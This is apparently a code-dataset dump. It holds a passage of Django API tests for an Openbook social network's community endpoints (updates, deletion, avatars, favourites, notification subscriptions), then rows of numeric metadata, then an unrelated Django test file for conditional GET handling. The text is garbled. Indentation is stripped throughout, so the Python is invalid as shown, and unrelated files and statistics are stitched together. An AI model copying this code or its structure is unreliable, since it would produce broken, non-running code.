community_name = community.name
url = self._get_url(community_name=community_name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
parsed_response = json.loads(response.content)
self.assertIn('name', parsed_response)
response_name = parsed_response['name']
self.assertEqual(response_name, community_name)
def test_cannot_retrieve_community_banned_from(self):
"""
should not be able to retrieve a community banned from and return 403
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community_owner = make_user()
community = make_community(creator=community_owner)
community_name = community.name
user.join_community_with_name(community_name=community.name)
community_owner.ban_user_with_username_from_community_with_name(username=user.username,
community_name=community.name)
url = self._get_url(community_name=community_name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_non_member_cannot_update_community(self):
"""
a non member of a community should not be able to update a community
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
new_community_name = make_community_name()
data = {
'name': new_community_name
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertNotEqual(community.name, new_community_name)
def test_member_cannot_update_community(self):
"""
a community member should not be able to update a community
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community_name=community.name)
new_community_name = make_community_name()
data = {
'name': new_community_name
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertNotEqual(community.name, new_community_name)
def test_moderator_cannot_update_community(self):
"""
a community moderator should not be able to update a community
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community_name=community.name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
new_community_name = make_community_name()
data = {
'name': new_community_name
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertNotEqual(community.name, new_community_name)
def test_can_update_administrated_community_name(self):
"""
should be able to update an administrated community name
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_name = make_community_name()
data = {
'name': new_community_name
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.name, new_community_name)
def test_cannot_update_administrated_community_name_to_taken_name(self):
"""
should not be able to update an administrated community name to an existing one and return 400
"""
user = make_user()
other_user = make_user()
other_community = make_community(creator=other_user)
community = make_community(creator=user)
data = {
'name': other_community.name
}
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertNotEqual(community.name, other_community.name)
def test_can_update_administrated_community_type(self):
"""
should be able to update an administrated community type
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user, type='P')
new_community_type = 'T'
data = {
'type': new_community_type
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.type, new_community_type)
def test_cannot_update_private_community_type(self):
"""
should NOT be able to update a private community type to public
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user, type='T')
new_community_type = 'P'
data = {
'type': new_community_type
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertEqual(community.type, 'T')
def test_can_update_administrated_community_title(self):
"""
should be able to update an administrated community title
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_title = make_community_title()
data = {
'title': new_community_title
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.title, new_community_title)
def test_can_update_administrated_community_users_adjective(self):
"""
should be able to update an administrated community users_adjective
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_users_adjective = make_community_users_adjective()
data = {
'users_adjective': new_community_users_adjective
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.users_adjective, new_community_users_adjective)
def test_can_update_administrated_community_invites_enabled(self):
"""
should be able to update an administrated community invites_enabled
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.invites_enabled = fake.boolean()
community.save()
new_community_users_adjective = not community.invites_enabled
data = {
'invites_enabled': new_community_users_adjective
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.invites_enabled, new_community_users_adjective)
def test_can_update_administrated_community_user_adjective(self):
"""
should be able to update an administrated community user_adjective
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_user_adjective = make_community_user_adjective()
data = {
'user_adjective': new_community_user_adjective
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.user_adjective, new_community_user_adjective)
def test_can_update_administrated_community_color(self):
"""
should be able to update an administrated community color
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_color = fake.hex_color()
data = {
'color': new_community_color
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.color, new_community_color)
def test_can_update_administrated_community_description(self):
"""
should be able to update an administrated community description
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_description = make_community_description()
data = {
'description': new_community_description
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.description, new_community_description)
def test_can_update_administrated_community_description_with_type_unchanged(self):
"""
should be able to update an administrated community description with the same type
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_description = make_community_description()
data = {
'description': new_community_description,
'type': 'P'
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.description, new_community_description)
def test_can_update_administrated_community_rules(self):
"""
should be able to update an administrated community rules
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_community_rules = make_community_rules()
data = {
'rules': new_community_rules
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertEqual(community.rules, new_community_rules)
def test_can_delete_administrated_community_description(self):
"""
should be able to delete the administrated community description and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'description': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.description)
def test_can_delete_administrated_community_rules(self):
"""
should be able to delete the administrated community rules and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'rules': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.rules)
def test_can_delete_administrated_community_user_adjective(self):
"""
should be able to delete the administrated community user_adjective and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'user_adjective': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.user_adjective)
def test_can_delete_administrated_community_users_adjective(self):
"""
should be able to delete the administrated community users_adjective and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'users_adjective': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.users_adjective)
def test_can_update_administrated_community_categories(self):
"""
should be able to update the administrated community categories and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
new_categories = []
for i in range(settings.COMMUNITY_CATEGORIES_MIN_AMOUNT, settings.COMMUNITY_CATEGORIES_MAX_AMOUNT):
category = make_category()
new_categories.append(category)
data = {
'categories': ','.join(map(str, [category.name for category in new_categories]))
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
categories = community.categories.all()
categories_ids = [category.pk for category in categories]
self.assertEqual(len(categories), len(new_categories))
for new_category in new_categories:
self.assertIn(new_category.pk, categories_ids)
def test_cannot_delete_administrated_community_categories(self):
"""
should not be able to update the administrated community categories and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
data = {
'categories': ''
}
url = self._get_url(community_name=community.name)
response = self.client.patch(url, data, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
community.refresh_from_db()
self.assertTrue(community.categories.exists())
def test_creator_can_delete_community(self):
"""
should be able to delete a created community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community_name = community.name
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(Community.objects.filter(pk=community.pk).exists())
def test_admin_cannot_delete_community(self):
"""
should not be able to delete a merely administrated community and return 400
"""
user = make_user()
other_user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name=community_name)
other_user.add_administrator_with_username_to_community_with_name(username=user.username,
community_name=community_name)
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(Community.objects.filter(pk=community.pk).exists())
def test_moderator_cannot_delete_community(self):
"""
should not be able to delete a merely moderated community and return 400
"""
user = make_user()
other_user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name=community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community_name)
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(Community.objects.filter(pk=community.pk).exists())
def test_member_cannot_delete_community(self):
"""
should not be able to delete a joined community and return 400
"""
user = make_user()
other_user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name=community_name)
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(Community.objects.filter(pk=community.pk).exists())
def test_user_cannot_delete_community(self):
"""
should not be able to delete a community and return 400
"""
user = make_user()
other_user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=other_user)
community_name = community.name
url = self._get_url(community_name=community_name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(Community.objects.filter(pk=community.pk).exists())
def test_cannot_retrieve_soft_deleted_community(self):
"""
should not be able to retrieve a soft deleted community and return 403
"""
global_moderator = make_global_moderator()
user = make_user()
headers = make_authentication_headers_for_user(user)
community_owner = make_user()
community = make_community(creator=community_owner)
community_name = community.name
community_reporter = make_user()
moderation_category = make_moderation_category()
community_reporter.report_community(community=community, category_id=moderation_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=moderation_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(community_name=community_name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def _get_url(self, community_name):
return reverse('community', kwargs={
'community_name': community_name
})
class CommunityAvatarAPITests(OpenbookAPITestCase):
"""
CommunityAvatarAPITests
"""
def test_can_update_administrated_community_avatar(self):
"""
should be able to update the avatar of an administrated community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.avatar = None
community.save()
new_avatar = make_community_avatar()
data = {
'avatar': new_avatar
}
url = self._get_url(community_name=community.name)
response = self.client.put(url, data, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
user.refresh_from_db()
self.assertIsNotNone(community.avatar)
def test_can_delete_administrated_community_avatar(self):
"""
should be able to delete the avatar of an administrated community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.avatar.save('avatar.jpg', File(make_community_avatar()))
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.avatar)
def _get_url(self, community_name):
return reverse('community-avatar', kwargs={
'community_name': community_name
})
class CommunityCoverAPITests(OpenbookAPITestCase):
"""
CommunityCoverAPITests
"""
def test_can_update_administrated_community_cover(self):
"""
should be able to update the cover of an administrated community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.cover = None
community.save()
new_cover = make_community_cover()
data = {
'cover': new_cover
}
url = self._get_url(community_name=community.name)
response = self.client.put(url, data, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
user.refresh_from_db()
self.assertIsNotNone(community.cover)
def test_can_delete_administrated_community_cover(self):
"""
should be able to delete the cover of an administrated community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
community.cover.save('cover.jpg', File(make_community_cover()))
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
community.refresh_from_db()
self.assertTrue(not community.cover)
def _get_url(self, community_name):
return reverse('community-cover', kwargs={
'community_name': community_name
})
class FavoriteCommunityAPITests(OpenbookAPITestCase):
"""
FavoriteCommunityAPITests
"""
def test_cant_favorite_not_joined_community(self):
"""
should not be able to favorite a community not joined
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user.has_favorite_community_with_name(community.name))
def test_can_favorite_joined_community(self):
"""
should be able to favorite a joined community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community.name)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(user.has_favorite_community_with_name(community.name))
def test_cant_favorite_already_favorite_community(self):
"""
should not be be able to favorite an already favorite community and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community.name)
user.favorite_community_with_name(community.name)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user.has_favorite_community_with_name(community.name))
def test_can_unfavorite_favorite_community(self):
"""
should be able to unfavorite a favorite community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community.name)
user.favorite_community_with_name(community.name)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(user.has_favorite_community_with_name(community.name))
def test_cant_unfavorite_not_favorite_community(self):
"""
should not be able to unfavorite a non favorite community and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.join_community_with_name(community.name)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user.has_favorite_community_with_name(community.name))
def _get_url(self, community_name):
return reverse('favorite-community', kwargs={
'community_name': community_name
})
class ExcludeTopPostsCommunityAPITests(OpenbookAPITestCase):
"""
ExcludeTopPostsCommunityAPITests
"""
def test_can_exclude_community(self):
"""
should be able to exclude a community from top posts
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertTrue(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def test_cannot_exclude_private_community(self):
"""
should not be able to exclude a private community from top posts
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type=Community.COMMUNITY_TYPE_PRIVATE)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def test_cannot_exclude_community_already_excluded(self):
"""
should not be able to exclude a community if already excluded from top posts
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.exclude_community_with_name_from_top_posts(community.name)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def test_can_remove_excluded_community(self):
"""
should be able to remove an community exclusion
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
user.exclude_community_with_name_from_top_posts(community.name)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertFalse(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def test_cannot_remove_exclusion_for_community_if_not_excluded(self):
"""
should not be able to remove an community exclusion, if the community is not excluded in the first place
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers, format='multipart')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user.has_excluded_community_with_name_from_top_posts(community_name=community.name))
def _get_url(self, community_name):
return reverse('legacy-exclude-community-from-top-posts', kwargs={
'community_name': community_name
})
class SubscribeToCommunityNotificationsAPITests(OpenbookAPITestCase):
def test_should_be_able_to_subscribe_to_notifications_for_community_if_member(self):
"""
should be able to subscribe to community posts for a community a member
"""
admin = make_user()
community = make_community(creator=admin, type='P')
community_member = make_user()
community_member.join_community_with_name(community_name=community.name)
headers = make_authentication_headers_for_user(community_member)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
subscription = CommunityNotificationsSubscription.objects.get(subscriber=community_member)
self.assertEqual(subscription.community.name, community.name)
self.assertTrue(subscription.new_post_notifications)
def test_should_not_be_able_to_subscribe_to_notifications_for_community_if_not_member(self):
"""
should not be able to subscribe to community posts for a community if not member
"""
admin = make_user()
community = make_community(creator=admin, type='P')
user = make_user()
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_not_be_able_to_subscribe_to_notifications_for_community_if_banned(self):
"""
should not be able to subscribe to community posts for a community if banned
"""
admin = make_user()
community = make_community(creator=admin, type='P')
user = make_user()
user.join_community_with_name(community_name=community.name)
admin.ban_user_with_username_from_community_with_name(username=user.username,
community_name=community.name)
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_not_be_able_to_subscribe_to_notifications_for_community_if_already_subscribed(self):
"""
should not be able to subscribe to community posts for a community if already subscribed
"""
admin = make_user()
community = make_community(creator=admin, type='P')
community_member = make_user()
community_member.join_community_with_name(community_name=community.name)
community_member.enable_new_post_notifications_for_community_with_name(community_name=community.name)
headers = make_authentication_headers_for_user(community_member)
url = self._get_url(community_name=community.name)
response = self.client.put(url, **headers)
subscriptions = CommunityNotificationsSubscription.objects.filter(subscriber=community_member, community=community)
self.assertEqual(len(subscriptions), 1)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_be_able_to_unsubscribe_to_notifications_for_community_if_member(self):
"""
should be able to unsubscribe to community posts for a community a member
"""
admin = make_user()
community = make_community(creator=admin, type='P')
community_member = make_user()
community_member.join_community_with_name(community_name=community.name)
community_member.enable_new_post_notifications_for_community_with_name(community_name=community.name)
headers = make_authentication_headers_for_user(community_member)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(CommunityNotificationsSubscription.objects.get(
subscriber=community_member, community=community).new_post_notifications)
def test_should_not_be_able_to_unsubscribe_to_notifications_for_community_if_not_member(self):
"""
should not be able to unsubscribe to community posts for a community if not member
"""
admin = make_user()
community = make_community(creator=admin, type='P')
user = make_user()
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_not_be_able_to_unsubscribe_to_notifications_for_community_if_banned(self):
"""
should not be able to unsubscribe to community posts for a community if banned
"""
admin = make_user()
community = make_community(creator=admin, type='P')
user = make_user()
user.join_community_with_name(community_name=community.name)
user.enable_new_post_notifications_for_community_with_name(community_name=community.name)
admin.ban_user_with_username_from_community_with_name(username=user.username,
community_name=community.name)
headers = make_authentication_headers_for_user(user)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_should_not_be_able_to_unsubscribe_to_notifications_for_community_if_already_subscribed(self):
"""
should not be able to unsubscribe to community posts for a community if already unsubscribed
"""
admin = make_user()
community = make_community(creator=admin, type='P')
community_member = make_user()
community_member.join_community_with_name(community_name=community.name)
headers = make_authentication_headers_for_user(community_member)
url = self._get_url(community_name=community.name)
response = self.client.delete(url, **headers)
subscriptions = CommunityNotificationsSubscription.objects.filter(
subscriber=community_member, community=community)
self.assertEqual(len(subscriptions), 0)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def _get_url(self, community_name):
return reverse('subscribe-community-new-post-notifications', kwargs={
'community_name': community_name
})
| 33.861178
| 123
| 0.686085
| 4,796
| 41,954
| 5.664095
| 0.040867
| 0.113418
| 0.076348
| 0.089969
| 0.879109
| 0.86674
| 0.831953
| 0.812737
| 0.781778
| 0.753101
| 0
| 0.007159
| 0.234185
| 41,954
| 1,238
| 124
| 33.88853
| 0.838339
| 0.091696
| 0
| 0.714919
| 0
| 0
| 0.016021
| 0.002199
| 0
| 0
| 0
| 0
| 0.150665
| 1
| 0.085672
| false
| 0
| 0.014771
| 0.008863
| 0.118168
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cbe378be893ab25ea61bd56e71f313d3297f3d3
| 9,145
|
py
|
Python
|
tests/conditional_processing/tests.py
|
bpeschier/django
|
f54c0ec06e390dc5bce95fdccbcb51d6423da4f9
|
[
"BSD-3-Clause"
] | 3
|
2020-05-30T17:08:51.000Z
|
2021-12-14T02:55:19.000Z
|
tests/conditional_processing/tests.py
|
bpeschier/django
|
f54c0ec06e390dc5bce95fdccbcb51d6423da4f9
|
[
"BSD-3-Clause"
] | 1
|
2021-03-24T12:21:05.000Z
|
2021-03-24T12:31:52.000Z
|
tests/conditional_processing/tests.py
|
bpeschier/django
|
f54c0ec06e390dc5bce95fdccbcb51d6423da4f9
|
[
"BSD-3-Clause"
] | 4
|
2016-07-31T14:29:15.000Z
|
2021-10-19T03:32:44.000Z
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime
from django.test import TestCase, override_settings
FULL_RESPONSE = 'Test conditional get response'
LAST_MODIFIED = datetime(2007, 10, 21, 23, 21, 47)
LAST_MODIFIED_STR = 'Sun, 21 Oct 2007 23:21:47 GMT'
LAST_MODIFIED_NEWER_STR = 'Mon, 18 Oct 2010 16:56:23 GMT'
LAST_MODIFIED_INVALID_STR = 'Mon, 32 Oct 2010 16:56:23 GMT'
EXPIRED_LAST_MODIFIED_STR = 'Sat, 20 Oct 2007 23:21:47 GMT'
ETAG = 'b4246ffc4f62314ca13147c9d4f76974'
EXPIRED_ETAG = '7fae4cd4b0f81e7d2914700043aa8ed6'
@override_settings(ROOT_URLCONF='conditional_processing.urls')
class ConditionalGet(TestCase):
def assertFullResponse(self, response, check_last_modified=True, check_etag=True):
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, FULL_RESPONSE.encode())
if check_last_modified:
self.assertEqual(response['Last-Modified'], LAST_MODIFIED_STR)
if check_etag:
self.assertEqual(response['ETag'], '"%s"' % ETAG)
def assertNotModified(self, response):
self.assertEqual(response.status_code, 304)
self.assertEqual(response.content, b'')
def test_without_conditions(self):
response = self.client.get('/condition/')
self.assertFullResponse(response)
def test_if_modified_since(self):
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertNotModified(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_NEWER_STR
response = self.client.get('/condition/')
self.assertNotModified(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_INVALID_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
def test_if_unmodified_since(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_NEWER_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_INVALID_STR
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
response = self.client.get('/condition/')
self.assertEqual(response.status_code, 412)
def test_if_none_match(self):
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
response = self.client.get('/condition/')
self.assertNotModified(response)
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
# Several etags in If-None-Match is a bit exotic but why not?
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s", "%s"' % (ETAG, EXPIRED_ETAG)
response = self.client.get('/condition/')
self.assertNotModified(response)
def test_if_match(self):
self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % ETAG
response = self.client.put('/condition/etag/')
self.assertEqual(response.status_code, 200)
self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % EXPIRED_ETAG
response = self.client.put('/condition/etag/')
self.assertEqual(response.status_code, 412)
def test_both_headers(self):
# see http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.3.4
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
response = self.client.get('/condition/')
self.assertNotModified(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
self.client.defaults['HTTP_IF_MODIFIED_SINCE'] = EXPIRED_LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_NONE_MATCH'] = '"%s"' % EXPIRED_ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
def test_both_headers_2(self):
self.client.defaults['HTTP_IF_UNMODIFIED_SINCE'] = LAST_MODIFIED_STR
self.client.defaults['HTTP_IF_MATCH'] = '"%s"' % ETAG
response = self.client.get('/condition/')
self.assertFullResponse(response)
